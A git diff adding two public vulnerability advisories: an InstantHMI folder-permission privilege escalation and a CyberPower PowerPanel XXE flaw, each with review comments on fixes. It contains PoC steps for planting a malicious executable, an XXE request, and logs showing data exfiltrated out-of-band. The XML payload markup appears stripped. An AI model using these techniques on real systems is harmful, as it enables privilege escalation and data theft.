@@ -0,0 +1,56 @@ +Title: InstantHMI - EoP: User to ADMIN +CWE Class: CWE-276: Incorrect Default Permissions +Date: 01/06/2016 +Vendor: Software Horizons +Product: InstantHMI +Version: 6.1 +Download link: http://www.instanthmi.com/ihmisoftware.htm +Tested on: Windows 7 x86, fully patched +Release mode: no bugbounty program, public release + +Installer Name: IHMI61-PCInstall-Unicode.exe +MD5: ee3ca3181c51387d89de19e89aea0b31 +SHA1: c3f1929093a3bc28f4f8fdd9cb38b1455d7f0d6f + +- 1. Introduction: - +During a standard installation (default option) the installer +automatically creates a folder named "IHMI-6" in the root drive. +No other location can be specified during standard installation. + +As this folder receives default permissions AUTHENTICATED USERS +are given the WRITE permission. + +Because of this they can replace binaries or plant malicious +DLLs to obtain elevated, administrative level, privileges. + +- 2. Technical Details/PoC: - +A. Obtain and execute the installer. + +B. Observe there is no prompt for the installation location. + +C. Review permissions under the Explorer Security tab or run icacls.exe + +Example: + +IHMI-6 BUILTIN\Administrators:(I)(F) + BUILTIN\Administrators:(I)(OI)(CI)(IO)(F) + NT AUTHORITY\SYSTEM:(I)(F) + NT AUTHORITY\SYSTEM:(I)(OI)(CI)(IO)(F) + BUILTIN\Users:(I)(OI)(CI)(RX) + NT AUTHORITY\Authenticated Users:(I)(M) + NT AUTHORITY\Authenticated Users:(I)(OI)(CI)(IO)(M) + +Successfully processed 1 files; Failed processing 0 files + +D. Change the main executable: InstantHMI.exe with a malicious copy. + +E. Once executed by an administrator our code will run +under administrator level privileges. + +- 3. Mitigation: - +A. Install under "c:\program files" or "C:\Program Files (x86)" + +B. set appropriate permissions on the application folder. + +- 4. Author: - +sh4d0wman diff --git a/platforms/xml/webapps/40077.txt b/platforms/xml/webapps/40077.txt new file mode 100755 index 000000000..782b580bf --- /dev/null 
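Review bot: The ACEs carrying Modify are `Authenticated Users:(I)(M)` and `(I)(OI)(CI)(IO)(M)` — the `(I)` flag shows they are inherited from the drive root rather than written by the installer, which is exactly why mitigation A (install under `C:\Program Files`) closes the bug: that tree does not hand Modify to Authenticated Users. The title promises "User to ADMIN", but step E makes the escalation conditional on an administrator later launching `InstantHMI.exe`; state that dependency in the summary so the severity is read correctly, and say whether any component runs as a service or autostart entry, which would remove the need for admin interaction (not visible here). A defender can confirm exposure with `icacls C:\IHMI-6` and look for the two Authenticated Users Modify entries.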
+++ b/platforms/xml/webapps/40077.txt 
@@ -0,0 +1,135 @@ +CyberPower Systems PowerPanel 3.1.2 XXE Out-Of-Band Data Retrieval + + +Vendor: CyberPower Systems, Inc. +Product web page: https://www.cyberpowersystems.com +Affected version: 3.1.2 (37567) Business Edition + +Summary: The PowerPanel® Business Edition software from +CyberPower provides IT professionals with the tools they +need to easily monitor and manage their backup power. +Available for compatible CyberPower UPS models, this +software supports up to 250 clients, allowing users remote +access (from any network PC with a web browser) to instantly +access vital UPS battery conditions, load levels, and runtime +information. Functionality includes application/OS shutdown, +event logging, hibernation mode, internal reports and analysis, +remote management, and more. + +Desc: PowerPanel suffers from an unauthenticated XML External +Entity (XXE) vulnerability using the DTD parameter entities +technique resulting in disclosure and retrieval of arbitrary +data on the affected node via out-of-band (OOB) attack. The +vulnerability is triggered when input passed to the xmlservice +servlet using the ppbe.xml script is not sanitized while parsing the +xml inquiry payload returned by the JAXB element translation. 
+ +================================================================ + +C:\Program Files (x86)\CyberPower PowerPanel Business Edition\ +\web\work\ROOT\webapp\WEB-INF\classes\com\cyberpowersystems\ppbe\webui\xmlservice\ +------------------------ +XmlServiceServlet.class: +------------------------ + +94: private InquirePayload splitInquirePayload(InputStream paramInputStream) +95: throws RequestException +96: { +97: try +98: { +99: JAXBContext localJAXBContext = JAXBContext.newInstance("com.cyberpowersystems.ppbe.core.xml.inquiry"); +100: Unmarshaller localUnmarshaller = localJAXBContext.createUnmarshaller(); +101: JAXBElement localJAXBElement = (JAXBElement)localUnmarshaller.unmarshal(paramInputStream); +102: return (InquirePayload)localJAXBElement.getValue(); +103: } +104: catch (JAXBException localJAXBException) +105: { +106: localJAXBException.printStackTrace(); +107: throw new RequestException(Error.INQUIRE_PAYLOAD_CREATE_FAIL, "Translate input to JAXB object failed."); +108: } +109: } + +--- + +C:\Program Files (x86)\CyberPower PowerPanel Business Edition\web\work\ROOT\webapp\WEB-INF\ +-------- +web.xml: +-------- + +28: +29: xmlService +30: com.cyberpowersystems.ppbe.webui.xmlservice.XmlServiceServlet +31: 3 +32: +.. +.. 
+60: +61: xmlService +62: /ppbe.xml +63: + +================================================================ + + +Tested on: Microsoft Windows 7 Ultimate SP1 EN + Microsoft Windows 8 + Microsoft Windows Server 2012 + Linux (64bit) + MacOS X 10.6 + Jetty(7.5.0.v20110901) + Java/1.8.0_91-b14 + SimpleHTTP/0.6 Python/2.7.1 + + +Vulnerability discovered by Gjoko 'LiquidWorm' Krstic + @zeroscience + + +Advisory ID: ZSL-2016-5338 +Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5338.php + + +22.06.2016 + +-- + + +C:\data\xxe.xml: +---------------- + + + "> + + +Request: +-------- + +POST /client/ppbe.xml HTTP/1.1 +Host: localhost:3052 +Content-Length: 258 +User-Agent: XXETester/1.0 +Connection: close + + + +%remote; +%root; +%oob;]> + + +action.notification.recipient.present + + + + + + +Response: +--------- + +C:\data>python -m SimpleHTTPServer 8011 +Serving HTTP on 0.0.0.0 port 8011 ... +lab07.home - - [03/Jul/2016 13:09:04] "GET /xxe.xml HTTP/1.1" 200 - +lab07.home - - [03/Jul/2016 13:09:04] "GET /?%5BMail%5D%0ACMCDLLNAME32=mapi32.dll%0ACMC=1%0AMAPI=1%0AMAPIX=1%0AMAPIXVER=1.0.0.1%0AOLEMessaging=1%0A HTTP/1.1" 301 - +lab07.home - - [03/Jul/2016 13:09:04] "GET /?%5BMail%5D%0ACMCDLLNAME32=mapi32.dll%0ACMC=1%0AMAPI=1%0AMAPIX=1%0AMAPIXVER=1.0.0.1%0AOLEMessaging=1%0A/ HTTP/1.1" 200 - \ No newline at end of file
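Review bot: The decompiled `splitInquirePayload` (listing lines 99–102) hands the raw request body to `Unmarshaller.unmarshal(InputStream)`, and with JAXB's default SAX setup that leaves DTD processing and external parameter entities enabled — that call, not the servlet mapping, is the line to fix, and the advisory would be more useful to the vendor if it said so next to the listing. The remedy is to parse with a hardened reader before JAXB sees the bytes: build an `XMLInputFactory` with `SUPPORT_DTD` and `IS_SUPPORTING_EXTERNAL_ENTITIES` set to `false`, create an `XMLStreamReader` from the stream, and call `unmarshal(reader)` in place of `unmarshal(paramInputStream)`, extending the catch to `XMLStreamException`. The `web.xml` excerpt shows `xmlService` mapped to `/ppbe.xml` with no `security-constraint` in the quoted lines, but only lines 28–32 and 60–63 are shown, so the "unauthenticated" claim is plausible rather than demonstrated here. The `xxe.xml` DTD body and the request's inline DOCTYPE appear to have been stripped in this rendering (only `%remote;`, `%root;`, `%oob;` survive), so readers may need the ZSL-2016-5338 advisory for the actual payload.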